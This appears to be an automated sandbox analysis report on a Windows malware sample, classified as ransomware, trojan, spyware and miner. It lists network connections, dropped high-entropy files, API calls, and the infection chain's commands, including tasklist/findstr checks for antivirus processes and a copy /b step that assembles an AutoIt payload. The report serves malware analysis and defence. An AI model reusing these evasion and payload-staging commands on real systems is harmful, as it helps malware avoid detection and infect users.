Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 56770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 58984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53120
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 58990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60181
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51862
Source: unknown	Network traffic detected: HTTP traffic on port 61833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 58995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54103
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60191
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53018
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61436
Source: unknown	Network traffic detected: HTTP traffic on port 53120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61833
Source: unknown	Network traffic detected: HTTP traffic on port 58989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64543
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49526
Source: unknown	Network traffic detected: HTTP traffic on port 58992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60483 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56540
Source: unknown	Network traffic detected: HTTP traffic on port 58986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49526 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60483
Source: unknown	Network traffic detected: HTTP traffic on port 58994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61694
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.11.20:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.245.203.37:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.152.20:443 -> 192.168.11.20:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.24.149:443 -> 192.168.11.20:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.11.20:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.245.203.37:443 -> 192.168.11.20:49800 version: TLS 1.2

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00B04830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

19_2_00B04830

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00B04632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

19_2_00B04632

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00B1D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

19_2_00B1D164

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Clearance entropy: 7.99663802819	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\January entropy: 7.99693481432	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Denmark entropy: 7.99686693968	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Wisdom entropy: 7.99692465234	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Gay entropy: 7.998406841	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Baby entropy: 7.99787388214	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\July entropy: 7.99793110694	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Johnson entropy: 7.99814673503	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Continental entropy: 7.99795128412	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Suitable entropy: 7.99688273383	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Invalid entropy: 7.99816543384	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Firmware entropy: 7.99826271782	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Hop entropy: 7.99728199081	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Bar entropy: 7.99699428009	Jump to dropped file
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Users\user\AppData\Local\Temp\Ruled entropy: 7.99803142953	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\646751\c entropy: 7.99984819043	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	File created: C:\Users\user\AppData\Local\SkySync Technologies\e entropy: 7.99984819043	Jump to dropped file

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript called in batch mode (surpress errors)

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js"

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AF42D5: CreateFileW,DeviceIoControl,CloseHandle,

19_2_00AF42D5

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AE8F2E DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

19_2_00AE8F2E

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		0_2_00403883
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AF5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		19_2_00AF5778

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Windows\SanyoToday	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Windows\DeletedWilliam	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Windows\BookmarkRolling	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	File created: C:\Windows\HimselfConsumption	Jump to behavior

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_3_0080588A	0_3_0080588A
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_3_007FF375	0_3_007FF375
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00A994E0	19_2_00A994E0
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00A99C80	19_2_00A99C80
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AB23F5	19_2_00AB23F5
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00B18400	19_2_00B18400
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AC6502	19_2_00AC6502
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00A9E6F0	19_2_00A9E6F0
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AC265E	19_2_00AC265E
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AB282A	19_2_00AB282A
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AC89BF	19_2_00AC89BF
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00B10A3A	19_2_00B10A3A
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AC6A74	19_2_00AC6A74
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AA0BE0	19_2_00AA0BE0
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AEEDB2	19_2_00AEEDB2
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00ABCD51	19_2_00ABCD51
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00B10EB7	19_2_00B10EB7
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AF8E44	19_2_00AF8E44
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AC6FE6	19_2_00AC6FE6
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AB33B7	19_2_00AB33B7
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00ABF409	19_2_00ABF409
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AAD45D	19_2_00AAD45D
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00A9F6A0	19_2_00A9F6A0
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AB16B4	19_2_00AB16B4
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AAF628	19_2_00AAF628
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00A91663	19_2_00A91663
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AB78C3	19_2_00AB78C3
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AB1BA8	19_2_00AB1BA8
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00ABDBA5	19_2_00ABDBA5
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AC9CE5	19_2_00AC9CE5
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AADD28	19_2_00AADD28
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AB1FC0	19_2_00AB1FC0
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00ABBFD6	19_2_00ABBFD6

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: String function: 00AA1A36 appears 34 times
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: String function: 00AB8B30 appears 42 times
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: String function: 00AB0D17 appears 70 times
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: String function: 004062A3 appears 58 times

Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8460 -s 2316

Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B56000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAutoIt3.exeB vs JHPvqMzKbz.exe

Source: JHPvqMzKbz.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.mine.winEXE@106/193@35/23

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AFA6AD GetLastError,FormatMessageW,

19_2_00AFA6AD

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AE8DE9 AdjustTokenPrivileges,CloseHandle,		19_2_00AE8DE9
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AE9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		19_2_00AE9399

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AF4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

19_2_00AF4148

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AF443D FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

19_2_00AF443D

Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif

File created: C:\Users\user\AppData\Local\SkySync Technologies

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8460
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8608:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8524:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8524:120:WilError_03

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

File created: C:\Users\user\AppData\Local\Temp\nsy8054.tmp

Jump to behavior

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat

Source: JHPvqMzKbz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
Source: chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
Source: chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380072270.00000C640126C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
Source: chrome.exe, 0000002C.00000002.172373177537.00000C64008C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: tasklist.exe, 00000004.00000003.168202537701.0000000000A71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process;.
Source: chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
Source: chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380072270.00000C640126C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376929627.00000C6400D6C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
Source: chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
Source: chrome.exe, 0000002C.00000002.172379241276.00000C6401188000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
Source: chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
Source: chrome.exe, 0000002C.00000002.172379307959.00000C64011A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';

Source: JHPvqMzKbz.exe

ReversingLabs: Detection: 13%

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

File read: C:\Users\user\Desktop\JHPvqMzKbz.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\JHPvqMzKbz.exe "C:\Users\user\Desktop\JHPvqMzKbz.exe"
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 646751
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AffiliateRobotsJoinedNewsletter" Purse
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Suitable + ..\Johnson + ..\July + ..\Firmware + ..\Invalid + ..\Baby + ..\Bar + ..\Continental + ..\Ruled + ..\Gay + ..\Hop + ..\Clearance + ..\Wisdom + ..\January + ..\Denmark + ..\Bull c
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\646751\Plates.pif Plates.pif c
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
